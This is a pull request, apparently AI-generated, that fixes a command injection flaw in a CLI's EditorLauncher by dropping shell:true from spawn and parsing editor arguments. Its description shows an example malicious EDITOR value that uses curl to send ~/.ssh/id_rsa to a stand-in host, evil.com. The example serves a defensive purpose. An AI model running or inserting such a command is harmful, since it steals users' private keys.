### PR TITLE
fix: remove shell:true to prevent command injection in EditorLauncher (Issue #79)

### DIFF
--- a/cli/src/editor/EditorLauncher.ts
+++ b/cli/src/editor/EditorLauncher.ts
@@ -82,9 +82,15 @@ export class EditorLauncher {
    */
   private launchEditor(editorCmd: string, filepath: string): Promise<void> {
     return new Promise((resolve, reject) => {
-      const editor = spawn(editorCmd, [filepath], {
+      // Parse editor command to separate command from arguments
+      // Split on spaces to handle editors with flags (e.g., "code --wait")
+      const parts = editorCmd.trim().split(/\s+/);
+      const cmd = parts[0];
+      const args = [...parts.slice(1), filepath];
+
+      const editor = spawn(cmd, args, {
         stdio: 'inherit', // Connect editor to terminal
-        shell: true,      // Allow shell commands
+        // NOTE: shell:true removed to prevent command injection vulnerability
       });
 
       editor.on('exit', (code) => {


### PR DESCRIPTION
## Summary

Fixes critical command injection vulnerability in `EditorLauncher` where `shell:true` allowed execution of arbitrary shell commands through malicious `$EDITOR` or `$VISUAL` environment variables.

**Fixes**: #79

## Changes

### Security Fix
- **Removed `shell: true`** from spawn options in `EditorLauncher.launchEditor()` (line 87)
- Added proper command parsing to split editor command from arguments
- Editor commands with flags (e.g., `code --wait`, `emacs -nw --no-splash`) are now handled safely

### Implementation Details
```typescript
// Before (vulnerable):
spawn(editorCmd, [filepath], { shell: true })

// After (secure):
const parts = editorCmd.trim().split(/\s+/);
const cmd = parts[0];
const args = [...parts.slice(1), filepath];
spawn(cmd, args, { stdio: 'inherit' })
```

### Test Coverage
Added 5 comprehensive security tests:
- Verifies `shell:true` is not present in spawn options
- Tests editor commands with single and multiple arguments
- Tests shell metacharacter injection prevention
- Tests whitespace handling in editor commands
- Updated existing test to verify shell option removal

## Security Impact

**Before**: Attackers could inject arbitrary commands via environment variables:
```bash
export EDITOR="vim; curl http://evil.com/steal?data=$(cat ~/.ssh/id_rsa)"
docimp improve ./src
# [E] Edit manually → executes malicious command
```

**After**: Shell metacharacters are not interpreted. The above would fail to spawn with `ENOENT` error rather than executing the injected command.

## Test Plan

- [x] All 137 tests pass (including 20 EditorLauncher tests)
- [x] Build successful with no TypeScript compilation errors
- [x] Security tests verify injection prevention
- [x] Editor commands with arguments work correctly (e.g., `code --wait`)
- [x] Simple editor commands still work (e.g., `vim`, `nano`)

## Testing Commands

```bash
# Run EditorLauncher tests
npm --prefix cli test -- EditorLauncher

# Run full test suite
npm --prefix cli test

# Build CLI
npm --prefix cli run build
```

Generated with [Claude Code](https://claude.com/claude-code)